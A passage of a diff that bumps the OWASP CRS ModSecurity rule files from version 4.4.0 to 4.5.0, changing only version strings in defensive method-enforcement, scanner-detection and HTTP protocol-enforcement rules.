 t:none,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.blocking_inbound_anomaly_score=0',\
 setvar:'tx.detection_inbound_anomaly_score=0',\
 setvar:'tx.inbound_anomaly_score_pl1=0',\
@@ -214,7 +214,7 @@ SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'tx.ua_hash=%{REQUEST_HEADERS.User-Agent}',\
 chain"
 SecRule TX:ua_hash "@unconditionalMatch" \
@@ -230,7 +230,7 @@ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
 msg:'Enabling body inspection',\
 tag:'OWASP_CRS',\
 ctl:forceRequestBodyVariable=On,\
- ver:'OWASP_CRS/4.4.0'"
+ ver:'OWASP_CRS/4.5.0'"
 SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
 "id:901350,\
 phase:1,\
@@ -240,7 +240,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
 noauditlog,\
 msg:'Enabling forced body inspection for ASCII content',\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 chain"
 SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
 "ctl:requestBodyProcessor=URLENCODED"
@@ -250,7 +250,7 @@ SecRule TX:sampling_percentage "@eq 100" \
 pass,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 skipAfter:END-SAMPLING"
 SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
 "id:901410,\
@@ -260,7 +260,7 @@ SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
 t:sha1,t:hexEncode,\
 nolog,\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'"
 SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \
 "id:901450,\
@@ -271,7 +271,7 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \
 msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\
 tag:'OWASP_CRS',\
 ctl:ruleRemoveByTag=OWASP_CRS,\
- ver:'OWASP_CRS/4.4.0'"
+ ver:'OWASP_CRS/4.5.0'"
 SecMarker "END-SAMPLING"
 SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \
 "id:901500,\
@@ -282,4 +282,4 @@ SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \
 log,\
 msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0'"
+ ver:'OWASP_CRS/4.5.0'"
diff --git a/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf
index 71f93c1..0f13d76 100644
--- a/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf
+++ b/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -18,7 +18,7 @@ SecRule REQUEST_LINE "@streq GET /" \
 tag:'platform-apache',\
 tag:'attack-generic',\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 chain"
 SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
 "t:none,\
@@ -35,7 +35,7 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
 tag:'platform-apache',\
 tag:'attack-generic',\
 tag:'OWASP_CRS',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 chain"
 SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \
 "t:none,\
diff --git a/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf
index c68d65e..48bf437 100644
--- a/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf
+++ b/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -7,8 +7,8 @@
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
 SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \
 "id:911100,\
 phase:1,\
@@ -23,13 +23,13 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \
 tag:'OWASP_CRS',\
 tag:'capec/1000/210/272/220/274',\
 tag:'PCI/12.1',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
 SecMarker "END-REQUEST-911-METHOD-ENFORCEMENT"
diff --git a/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf b/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf
index 4cd3213..eb8a8e7 100644
--- a/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf
+++ b/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -7,8 +7,8 @@
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION"
 SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \
 "id:913100,\
 phase:1,\
@@ -25,13 +25,13 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" 
"id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecMarker "END-REQUEST-913-SCANNER-DETECTION" diff --git a/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf index b33711a..6c07d3b 100644 --- a/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf +++ b/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # 
@@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\x0b#]*)?(?:#[^\s\x0b]*)?|(?:connect (?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}\.?(?::[0-9]+)?|[\--9A-Z_a-z]+:[0-9]+)|options \*|[a-z]{3,10}[\s\x0b]+(?:[0-9A-Z_a-z]{3,7}?://[\--9A-Z_a-z]*(?::[0-9]+)?)?/[^#\?]*(?:\?[^\s\x0b#]*)?(?:#[^\s\x0b]*)?)[\s\x0b]+[\.-9A-Z_a-z]+)$" \ "id:920100,\ phase:1,\ @@ -23,7 +23,7 @@ SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\x0b#]*)?(?:#[^\s\x0b]*) tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegilnorsuz]acut|[aeiou]grav|[aino]tild)e|[c-elnr-tz]caron|(?:[cgklnr-t]cedi|[aeiouy]um)l|[aceg-josuwy]circ|[au]ring|a(?:mp|pos)|nbsp|oslash);|[^\"';=])*$" \ 
@@ -40,7 +40,7 @@ SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegilnorsuz]acut|[aeiou]grav|[a tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ @@ -57,7 +57,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ @@ -74,7 +74,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Content-Length "!@rx ^0?$" \ @@ -94,7 +94,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ @@ -114,7 +114,7 @@ SecRule REQUEST_PROTOCOL "!@within HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_METHOD "@streq POST" \ @@ -136,7 +136,7 @@ SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule &REQUEST_HEADERS:Content-Length "!@eq 0" \ 
@@ -157,7 +157,7 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule TX:2 "@lt %{tx.1}" \ @@ -176,7 +176,7 @@ SecRule REQUEST_HEADERS:Connection "@rx \b(?:keep-alive|close),\s?(?:keep-alive| tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" SecRule REQUEST_URI_RAW "@rx \x25" \ @@ -193,7 +193,7 @@ SecRule REQUEST_URI_RAW "@rx \x25" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_URI_RAW "@rx ^(.*)/(?:[^\?]+)?(\?.*)?$" \ @@ -217,7 +217,7 @@ SecRule REQUEST_BASENAME "!@rx ^.*%.*\.[^\s\x0b\.]+$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule TX:0 "@validateUrlEncoding" \ @@ -237,7 +237,7 @@ SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" \ @@ -257,7 +257,7 @@ SecRule REQUEST_URI|REQUEST_BODY "@rx (?i)%uff[0-9a-f]{2}" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \ 
@@ -274,7 +274,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule &REQUEST_HEADERS:Host "@eq 0" \ @@ -291,7 +291,7 @@ SecRule &REQUEST_HEADERS:Host "@eq 0" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}',\ skipAfter:END-HOST-CHECK" @@ -308,7 +308,7 @@ SecRule REQUEST_HEADERS:Host "@rx ^$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecMarker "END-HOST-CHECK" @@ -325,7 +325,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ @@ -346,7 +346,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ @@ -367,7 +367,7 @@ SecRule REQUEST_HEADERS:User-Agent "@rx ^$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ 
@@ -383,7 +383,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ @@ -404,7 +404,7 @@ SecRule REQUEST_HEADERS:Host "@rx (?:^([\d.]+|\[[\da-f:]+\]|[\da-f:]+)(:[\d]+)?$ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" SecRule &TX:MAX_NUM_ARGS "@eq 1" \ @@ -421,7 +421,7 @@ SecRule &TX:MAX_NUM_ARGS "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule &ARGS "@gt %{tx.max_num_args}" \ @@ -441,7 +441,7 @@ SecRule &TX:ARG_NAME_LENGTH "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" \ @@ -461,7 +461,7 @@ SecRule &TX:ARG_LENGTH "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule ARGS "@gt %{tx.arg_length}" \ @@ -481,7 +481,7 @@ SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" \ @@ -500,7 +500,7 @@ SecRule &TX:MAX_FILE_SIZE "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ 
@@ -522,7 +522,7 @@ SecRule &TX:COMBINED_FILE_SIZES "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" \ @@ -543,7 +543,7 @@ SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s?(?:action|bounda tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ @@ -562,7 +562,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.content_type=|%{tx.0}|',\ chain" @@ -585,7 +585,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.content_type_charset=|%{tx.1}|',\ chain" @@ -608,7 +608,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule 